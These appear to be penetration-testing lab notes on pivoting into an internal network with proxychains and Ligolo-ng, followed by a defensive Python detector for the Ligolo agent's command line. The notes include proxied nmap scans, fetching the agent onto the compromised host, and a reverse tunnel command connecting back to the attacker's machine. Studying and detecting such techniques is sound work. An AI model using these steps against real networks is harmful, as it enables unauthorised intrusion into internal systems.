# Proxychains
- set up a SOCKS5 proxy and leverage `proxychains4`
- ensure `socks5 127.0.0.1 9050` appears in `/etc/proxychains4.conf` ![[images/Pasted image 20251015091753.png]]
- add `dmz01` to `/etc/hosts` ![[images/Pasted image 20251015091825.png]]
- start the SSH SOCKS5 proxy ![[images/Pasted image 20251015091900.png]]

# Internal Recon
- attempt nmap scans of internal hosts
    - all top ports are filtered ![[images/Pasted image 20251015092007.png]]
- attempt some nxc scans ![[images/Pasted image 20251015094522.png]]![[images/Pasted image 20251015094536.png]]
- `nmap` via `proxychains4` requires the `-sT` flag (TCP full connect, 3-way handshake), because raw-packet scans such as SYN scans do not go through the proxy
```bash
proxychains4 -q nmap -sT -Pn <target_ip> -F -T5
```

# Ligolo-ng (alt pivot method)
## Kali host
- download proxy on Kali host ![[images/Pasted image 20251014194729.png]]
- decompress proxy ![[images/Pasted image 20251014194754.png]]
- give proxy 777 perms ![[images/Pasted image 20251015152815.png]]
- start proxy with `-selfcert` flag ![[images/Pasted image 20251014194836.png]]
```bash
sudo ./proxy -selfcert
```
- once the agent joins we should see the following ![[images/Pasted image 20251014195357.png]]

### Autoroute
- target a session with `session`, then `autoroute` to create and configure the interface and route and start the tunnel
- new interface name `specialraptor` is created ![[images/Pasted image 20251015153718.png]]
- confirm with `ip a` ![[images/Pasted image 20251015153626.png]]
- confirm with `ip route list` ![[images/Pasted image 20251015153640.png]]
- enter all subsequent commands with `sudo`

### Manual routing
```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
ip a #confirm new interface
sudo ip route add 192.168.0.0/24 dev ligolo
ip route list #confirm existence of new route
```
- connect to session and type `start`

## Victim Pivot Point
- host agent file from Kali
    - `python3 -m http.server` from location of proxy file ![[images/Pasted image 20251014201116.png]]
- download agent ![[images/Pasted image 20251014194939.png]]
- give agent 777 perms ![[images/Pasted image 20251015152945.png]]
- connect agent to proxy server ![[images/Pasted image 20251014195335.png]]
```bash
./agent -connect <kali_host_ip>:11601 -ignore-cert
```
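
From the defender's side, the agent invocation above is recognisable by its flag pairing (`-connect host:port` with `-ignore-cert`) rather than by its file name. The following is an added example, not part of the original notes: it scans constructed process-creation records and correlates a hit with an earlier `chmod 777` on the same file. The `host|user|command line` record format, the address `10.10.14.5`, the path `/tmp/.cache/upd` and the acceptance of Go-style flag spellings are assumptions.

```python
import os
import re
import shlex

# Constructed process-creation records for a pivot host: host|user|command line.
SAMPLE_LOG = """\
dmz01|www-data|chmod 777 agent
dmz01|www-data|./agent -connect 10.10.14.5:11601 -ignore-cert
dmz01|backup|/tmp/.cache/upd --ignore-cert --connect=10.10.14.5:443
dmz01|backup|curl --connect-timeout 5 https://example.com/health
"""

ENDPOINT = re.compile(r"^[\w.-]+:\d{1,5}$")

def flags(argv):
    """Map flag name -> value (None if bare), treating -f, --f and -f=v alike.
    Assumption: the agent parses arguments the way Go's flag package does."""
    out, args = {}, argv[1:]
    for i, arg in enumerate(args):
        if not arg.startswith("-"):
            continue
        name, eq, value = arg.lstrip("-").partition("=")
        if not eq:
            nxt = args[i + 1] if i + 1 < len(args) else None
            value = nxt if nxt and not nxt.startswith("-") else None
        out[name] = value
    return out

def detect(log_text):
    """One finding per command line pairing -connect host:port with -ignore-cert."""
    findings, chmod_777 = [], set()
    for line in filter(str.strip, log_text.splitlines()):
        host, user, cmdline = line.split("|", 2)
        argv = shlex.split(cmdline)
        if argv[:2] == ["chmod", "777"]:
            chmod_777.update((host, os.path.basename(p)) for p in argv[2:])
            continue
        f = flags(argv)
        endpoint = f.get("connect")
        if "ignore-cert" in f and endpoint and ENDPOINT.match(endpoint):
            findings.append({
                "host": host, "user": user, "binary": argv[0], "endpoint": endpoint,
                "port_11601": endpoint.endswith(":11601"),
                "chmod_777_first": (host, os.path.basename(argv[0])) in chmod_777,
            })
    return findings

if __name__ == "__main__":
    print(*detect(SAMPLE_LOG), sep="\n")
```

The `curl --connect-timeout` record is deliberately left unflagged: the match is on the exact flag names, not on a substring.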